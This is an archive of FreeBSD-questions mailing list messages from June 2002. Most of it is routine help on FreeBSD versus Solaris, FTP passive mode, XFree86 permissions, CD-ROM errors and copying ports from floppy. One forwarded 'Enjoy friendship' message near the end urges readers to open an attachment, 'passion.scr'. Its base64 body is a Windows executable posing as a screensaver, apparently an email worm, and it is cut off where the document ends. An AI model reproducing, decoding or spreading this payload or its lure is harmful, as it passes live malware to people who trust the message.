falcon.mail.pas.earthlink.net with esmtp (Exim 3.33 #2) id 17M8W2-0000LV-00; Sun, 23 Jun 2002 07:38:58 -0700 Received: from rtcol2dod4he5l2 (cable [12.164.45.65]) by ns.flncs.com (Postfix) with ESMTP id DDC8953C9; Sun, 23 Jun 2002 10:43:01 -0400 (EDT) Message-ID: <00d801c21ac4$c7e96870$f901a8c0@rtcol2dod4he5l2> From: "Moti Levy" To: "Steve Warwick" Cc: "freebsd-questions" References: Subject: Re: [OFF] FreeBSD vs Solaris - Opinions? Date: Sun, 23 Jun 2002 10:38:33 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG which is better jeep cherokee or bmw convertible ? it depends if you want to go off road or cruz the beach .... if you tell us what are the uses you want to implement we will be able to give you an answer that will make sense . Moti ----- Original Message ----- From: "Steve Warwick" To: Sent: Sunday, June 23, 2002 4:43 AM Subject: [OFF] FreeBSD vs Solaris - Opinions? > Hi All, > > Sorry for the off topic post but I am interested to get some different > opinions on the "which is better FreeBSD or Solaris?" topic. Everyone I know > is pro Sun so I'm trying to get a balanced view. > > Actually, to clarify my situation: > > Which, in your opinion would make a better server. Sun UltrSparc 5 / 333mhz > running Solaris (I got a great deal on a couple of machines) or a generic > Athlon 1.2mhz running FreeBSD. [both machines have ATA drives & 256meg] > > Your thoughts and expert opinions welcomed, including the peripheral topics > of support, usergroups etc. > > Thanks, > > > Steve > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 7:56:47 2002 Delivered-To: freebsd-questions@freebsd.org Received: from CPE0004761ac738-CM00109515bc65.cpe.net.cable.rogers.com (CPE0004761ac738-CM00109515bc65.cpe.net.cable.rogers.com [24.103.39.131]) by hub.freebsd.org (Postfix) with SMTP id CE36F37B400 for ; Sun, 23 Jun 2002 07:56:42 -0700 (PDT) Received: (qmail 55719 invoked by uid 1001); 23 Jun 2002 14:57:01 -0000 Date: Sun, 23 Jun 2002 10:57:01 -0400 From: Miroslav Pendev To: Steve Warwick Cc: questions@freebsd.org Subject: Re: [OFF] FreeBSD vs Solaris - Opinions? Message-ID: <20020623145701.GA55566@CPE0004761ac738-CM00109515bc65.cpe.net.cable.rogers.com> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: X-Divine-Shadow-Zone: Beware of Lexxx! X-Operating-System: FreeBSD 4.6 User-Agent: Mutt/1.5.1i Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Sun, Jun 23, 2002 at 01:43:48AM -0700, Steve Warwick wrote: > Hi All, > > Sorry for the off topic post but I am interested to get some different > opinions on the "which is better FreeBSD or Solaris?" topic. Everyone I know > is pro Sun so I'm trying to get a balanced view. > > Actually, to clarify my situation: > > Which, in your opinion would make a better server. Sun UltrSparc 5 / 333mhz > running Solaris (I got a great deal on a couple of machines) or a generic > Athlon 1.2mhz running FreeBSD. [both machines have ATA drives & 256meg] > > Your thoughts and expert opinions welcomed, including the peripheral topics > of support, usergroups etc. > > Thanks, > > > Steve I am not familiar with the kernel differences but here is what I can tell you: As Firewall & NAT I don't know anything better than FreeBSD! For servers: well it depends from what kind of server you need www, ftp or File server for Windows with Samba. As far sa I know the version of Samba for Solaris 8 is little bit behind the version for FreeBSD. I use to deal with Solaris 8 for Intel's hardware recently and it was nightmare to get it working with my hardware until I remove anithing that wasn't in Sun's Hardware Compatibility List - in this case ... 3Com 905C NIC. In the list was 3Com 905B ;-))) Well the next version Solaris 8 10 01 was with support for my card, but ... From other side Sun's Sparc is very stable hardware and is good if you wish to not dial with strange locks because of cheap hardware (as it hapens with Intel's 'third party' cards ;-) ) So, your question is not only FresBSD vs Solaris, it is Sparc vs Intel architecture. For Intel only - FreeBSD RULES!!! ;-) By my opinion the only thing Solaris is little bit better than FreeBSD is Java development, "for everithing else... there is ..." FreeBSD. (sory, too many MasterCard comercials these days...) By nature Solaris is slooowww (I call it slooowwaris) it needs good machine like dial CPU's 1G RAM etc... in order to work as you wish... Well I have few more toughts, but ... in the nex letter ;-) Hope that helps! --Miro To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 8: 2: 7 2002 Delivered-To: freebsd-questions@freebsd.org Received: from neonpark.inter-sonic.com (neonpark.inter-sonic.com [212.247.185.177]) by hub.freebsd.org (Postfix) with ESMTP id 34F8037B401 for ; Sun, 23 Jun 2002 08:02:04 -0700 (PDT) Received: from penguin.inter-sonic.com (penguin.inter-sonic.com [172.16.1.3]) by neonpark.inter-sonic.com (8.11.4/8.11.4) with ESMTP id g5NF22l17513 for ; Sun, 23 Jun 2002 17:02:03 +0200 (CEST) Received: from intersonic.se ([217.215.7.177]) by penguin.inter-sonic.com (Netscape Messaging Server 4.15) with ESMTP id GY5Z3E00.40I for ; Sun, 23 Jun 2002 17:02:02 +0200 Message-ID: <3D15E2E9.9040708@intersonic.se> Date: Sun, 23 Jun 2002 17:02:01 +0200 From: "Per olof Ljungmark" User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.0.0) Gecko/20020619 X-Accept-Language: en-us, en MIME-Version: 1.0 To: freebsd-questions Subject: confused over ftp access from FBSD client Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG We have a FBSD ftp server connected to the net through a OpenBSD firewall. What confuses me is that we never have a problem connecting from various win clients, but from a FreeBSD or OpenBSD client we have to issue a 'pas' (turning passive mode off) command to get a directory listing or transfer. With graphical clients it is impossible to connect even if passive mode is selected in setup. I wonder if somebody could please give me a hint what is going on. /per olof To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 8:21: 0 2002 Delivered-To: freebsd-questions@freebsd.org Received: from web10004.mail.yahoo.com (web10004.mail.yahoo.com [216.136.130.40]) by hub.freebsd.org (Postfix) with SMTP id E106037B400 for ; Sun, 23 Jun 2002 08:20:51 -0700 (PDT) Message-ID: <20020623152051.2177.qmail@web10004.mail.yahoo.com> Received: from [24.206.136.245] by web10004.mail.yahoo.com via HTTP; Sun, 23 Jun 2002 08:20:51 PDT Date: Sun, 23 Jun 2002 08:20:51 -0700 (PDT) From: Ronnie Clark Reply-To: Ronj_clark@yahoo.com Subject: Re: FBSD 4.6, XFree86 4.2.0, and permissions? To: Roman Neuhauser Cc: FreeBSD Questions In-Reply-To: <20020623135907.GD10684@freepuppy.bellavista.cz> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Thanks, Worked like a charm! RC --- Roman Neuhauser wrote: > > Date: Sun, 23 Jun 2002 06:52:11 -0700 (PDT) > > From: Ronnie Clark > > Subject: FBSD 4.6, XFree86 4.2.0, and permissions? > > To: FreeBSD Questions > > > > > Good Sunday Morning! > > > > I have finally got some kinks worked out. I now > have > > my mouse working, so the new X is great. I created > > myself a regular user account with the ability to > su > > to root. I log out as root, then log in as myself. > I > > try to startx, and I get an error message saying > that > > I cannot and do not have permission to open > > /var/log/XFree86.0.log. Has anyone else seen this? > How > > does one fix this silliness? > > Do you have Xwrapper installed? > (/usr/ports/x11/wrapper) > > -- > FreeBSD 4.5-STABLE > 3:58PM up 20 days, 5:46, 12 users, load averages: > 0.00, 0.01, 0.00 __________________________________________________ Do You Yahoo!? Yahoo! - Official partner of 2002 FIFA World Cup http://fifaworldcup.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 8:33:20 2002 Delivered-To: freebsd-questions@freebsd.org Received: from www2.mailru.com (www2.mailru.com [80.68.244.5]) by hub.freebsd.org (Postfix) with ESMTP id A2BEC37B400 for ; Sun, 23 Jun 2002 08:33:07 -0700 (PDT) Received: from lamoz (ppp-027.dialup.ipc.ru [193.178.159.27]) (authenticated bits=0) by www2.mailru.com (8.12.1/8.12.1) with ESMTP id g5NFU54I018129; Sun, 23 Jun 2002 19:30:07 +0400 (MSD) (envelope-from lamoz@mailru.com) Date: Sun, 23 Jun 2002 19:33:21 +0400 From: "[.lamoz]" To: m.seaman@infracaninophile.co.uk, freebsd-questions@FreeBSD.ORG Subject: Re: Re: my cd-rom goes mad. Message-Id: <20020623193321.3cc14e51.lamoz@mailru.com> X-Mailer: Sylpheed version 0.7.6claws (GTK+ 1.2.10; i386-portbld-freebsd4.5) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Matthew Seaman wrote: On Sun, Jun 23, 2002 at 11:10:58AM +0100, Matthew Seaman wrote: >>On Sun, Jun 23, 2002 at 12:10:45PM +0400, [.lamoz] wrote: >> >>> >>>After updatinf fbsd from 4.5R to 4.6S i can't access any file on >>>cd-rom. Cd-rom mounts successful, but when i'm trying to copy or >>>read file i gor *error message*, and it repeates until i reboot >>>PC. Please help me. In all newsgroups(russian ones) i didn't got any >>>answer. +((( >> >>http://people.freebsd.org/~bmah/relnotes/4-STABLE/errata.html > > >Bah! Right text, wrong location. The official place is, of course: > >http://www.freebsd.org/releases/4.6R/errata.html > > Matthew i updated fbsd by cvsup. so i can't reinstall it. also i can't download iso image cuz of a little cps. i set hw.ata.... here is it: |lamoz# sysctl -a | grep dma |hw.ata.ata_dma: 1 |hw.ata.atapi_dma: 1 |lamoz# so i don't know what to do =(... To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 9: 3:46 2002 Delivered-To: freebsd-questions@freebsd.org Received: from hotmail.com (f268.law8.hotmail.com [216.33.240.143]) by hub.freebsd.org (Postfix) with ESMTP id 26D8C37B405 for ; Sun, 23 Jun 2002 09:03:39 -0700 (PDT) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Sun, 23 Jun 2002 09:03:38 -0700 Received: from 61.11.74.131 by lw8fd.law8.hotmail.msn.com with HTTP; Sun, 23 Jun 2002 16:03:38 GMT X-Originating-IP: [61.11.74.131] From: "Ganesh Kumar" To: wmoran@potentialtech.com Cc: freebsd-questions@freebsd.org Subject: Re: Urgent - ports install error - pls help ! Date: Sun, 23 Jun 2002 16:03:38 +0000 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 23 Jun 2002 16:03:38.0943 (UTC) FILETIME=[89A1CCF0:01C21ACF] Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG >From: Bill Moran >Do you have a net connection from this machine? It looks like you're >unable >to connect to the Internet to download the necessary files. mkisofs may be >on the CD. Read this page and see if it helps you: >http://www.freebsd.org/handbook/ports-using.html No.I dont have a net connection to this machine.I just downloaded the mkisofs.tgz file from the ports directory of a freeBSD ftp site.Could some one let me know how to copy this file ? My floppy drive is Sony - NEC clone. /dev/fd0 doesnt work(tried all the combinations). regards Ganesh Kumar >To: Ganesh Kumar >CC: freebsd-questions@freebsd.org >Subject: Re: Urgent - ports install error - pls help ! >Date: Sat, 22 Jun 2002 12:59:11 -0400 >MIME-Version: 1.0 >Received: from [65.168.0.12] by hotmail.com (3.2) with ESMTP id >MHotMailBEDDF66B005D4004325E41A8000CCADC0; Sat, 22 Jun 2002 09:52:59 -0700 >Received: from potentialtech.com (mhope-dhcp-65-168-1-181.dashfast.com >[65.168.1.181])by infinity.aesredfish.net (8.11.6/8.11.0) with ESMTP id >g5MGqvr11921;Sat, 22 Jun 2002 12:52:57 -0400 >From wmoran@potentialtech.com Sat, 22 Jun 2002 09:54:11 -0700 >Message-ID: <3D14ACDF.3040302@potentialtech.com> >User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.0rc1) >Gecko/20020502 >X-Accept-Language: en-us, en >References: > >Ganesh Kumar wrote: >>Hi, >>I am unable to install the ports in my machine.When I use the >>/cdrom/ports/install.sh it seems to install everything but when I give , > >No, installing that does not install everything. It only installs "config" >files that explain to the system how to get the necessary files and install >them. >If you wanted to install EVERYTHING for all the ports, you would need mucho >gigabytes. > >># cd /usr/ports/sysutils/mkisofs >>#make >> >>I get,"Fetching from ftp://...".mkisofs.tgz not found in >>/usr/ports/distfile. > >Do you have a net connection from this machine? It looks like you're >unable >to connect to the Internet to download the necessary files. mkisofs may be >on the CD. Read this page and see if it helps you: >http://www.freebsd.org/handbook/ports-using.html > >-- >Bill Moran >Potential Technologies >http://www.potentialtech.com > -- Yvonne: Where were you last night? Rick: That's so long ago, I don't remember. Yvonne: Will I see you tonight? Rick: I never make plans that far ahead. Casablanca(1942) _________________________________________________________________ Send and receive Hotmail on your mobile device: http://mobile.msn.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 9:22:54 2002 Delivered-To: freebsd-questions@freebsd.org Received: from infinity.aesredfish.net (ns1.aesredfish.net [65.168.0.12]) by hub.freebsd.org (Postfix) with ESMTP id 27EC537B4A0 for ; Sun, 23 Jun 2002 09:22:06 -0700 (PDT) Received: from potentialtech.com (mhope-dhcp-65-168-1-181.dashfast.com [65.168.1.181]) by infinity.aesredfish.net (8.11.6/8.11.0) with ESMTP id g5NGLwr19677; Sun, 23 Jun 2002 12:21:58 -0400 Message-ID: <3D15F71C.8010601@potentialtech.com> Date: Sun, 23 Jun 2002 12:28:12 -0400 From: Bill Moran User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.0rc1) Gecko/20020502 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Ganesh Kumar Cc: freebsd-questions@freebsd.org Subject: Re: Urgent - ports install error - pls help ! References: Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Ganesh Kumar wrote: >> From: Bill Moran >> Do you have a net connection from this machine? It looks like you're >> unable >> to connect to the Internet to download the necessary files. mkisofs >> may be >> on the CD. Read this page and see if it helps you: >> http://www.freebsd.org/handbook/ports-using.html > > No.I dont have a net connection to this machine.I just downloaded the > mkisofs.tgz file from the ports directory of a freeBSD ftp site.Could > some one let me know how to copy this file ? > > My floppy drive is Sony - NEC clone. > > /dev/fd0 doesnt work(tried all the combinations). Is it an MS-DOS formatted floppy? Did you try mount_msdos /dev/fd0 /mnt What error message do you get when you try to mount it? Is there a fd0 device in the /dev directory? You may have to run MAKEDEV. If you look through dmesg output, do you see your floppy drive as probled and detected? -- Bill Moran Potential Technologies http://www.potentialtech.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 9:50:59 2002 Delivered-To: freebsd-questions@freebsd.org Received: from hana-internet.hanabank.com (mail.hanabank.co.kr [211.32.31.251]) by hub.freebsd.org (Postfix) with ESMTP id 031E137B400 for ; Sun, 23 Jun 2002 09:50:56 -0700 (PDT) Received: from hana ([111.10.5.129]) by hana-internet.hanabank.com (Netscape Messaging Server 4.15) with SMTP id GY63YU00.5LR for ; Mon, 24 Jun 2002 01:47:18 +0900 Message-ID: <001f01c21ad7$17ae87c0$81050a6f@intra.hanabank.co.kr> From: yunseukcha@hanabank.com To: Subject: question about BSD Daemon image Date: Mon, 24 Jun 2002 01:57:43 +0900 Organization: hanabank MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_001B_01C21B22.876CFCE0" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2615.200 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG This is a multi-part message in MIME format. ------=_NextPart_000_001B_01C21B22.876CFCE0 Content-Type: text/plain; charset="euc-kr" Content-Transfer-Encoding: 7bit Hi... Can I use the BSD Daemon on T-shirts for sale ? thank you ------=_NextPart_000_001B_01C21B22.876CFCE0 Content-Type: text/html; charset="euc-kr" Content-Transfer-Encoding: quoted-printable
Hi...
 
Can I use the BSD Daemon on T-shirts for sale = ?
 
thank you
------=_NextPart_000_001B_01C21B22.876CFCE0-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 9:52: 8 2002 Delivered-To: freebsd-questions@freebsd.org Received: from host3.visualpresence2000.com (host3.visualpresence2000.com [209.239.53.64]) by hub.freebsd.org (Postfix) with ESMTP id 1E4A437B406 for ; Sun, 23 Jun 2002 09:51:06 -0700 (PDT) Received: from mail.carnahan.ws (66-81-20-141-modem.o1.com [66.81.20.141]) by host3.visualpresence2000.com (8.10.2/8.10.2) with SMTP id g5NGoZg11323 for ; Sun, 23 Jun 2002 12:50:38 -0400 Message-Id: <200206231650.g5NGoZg11323@host3.visualpresence2000.com> From: Ken Carnahan To: questions@FreeBSD.ORG Subject: Fw: Enjoy friendship Date: Sun,23 Jun 2002 09:50:16 PM X-Mailer: Microsoft Outlook Express 5.50.4133.2400 MIME-Version: 1.0 Content-Type: multipart/mixed; boundary=sdlncqm Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG --sdlncqm Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Hi
Check the Attachement ..

Ken Carnahan

----- Original Message -----
From: "friends" < friends@lovescr.com >
To: < ken@carnahan.ws >
Sent: Sun,23 Jun 2002 09:50:16 PM
Subject: Enjoy friendship


This e-mail is never sent unsolicited. If you need to unsubscribe,
follow the instructions at the bottom of the message.
***********************************************************

Enjoy this friendship Screen Saver and Check ur friends circle...

Send this screensaver from www.lovescr.com to everyone you
consider a FRIEND, even if it means sending it back to the person
who sent it to you. If it comes back to you, then you'll know you
have a circle of friends.

* To remove yourself from this mailing list, point your browser to:
http://lovescr.com/remove?freescreensaver
* Enter your email address (ken@carnahan.ws) in the field provided and click "Unsubscribe".

OR...

* Reply to this mes! sage with the word "REMOVE" in the subject line.

This message was sent to address ken@carnahan.ws
X-PMG-Recipient: ken@carnahan.ws
<<<>>> <<<>>> <<<>>> <<<>>> <<<>>> <<<>>> <<<>>> <<<>>> <<<>>> <<<>>>
--sdlncqm Content-Type: application/octet-stream; name=passion.scr Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="passion.scr" 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 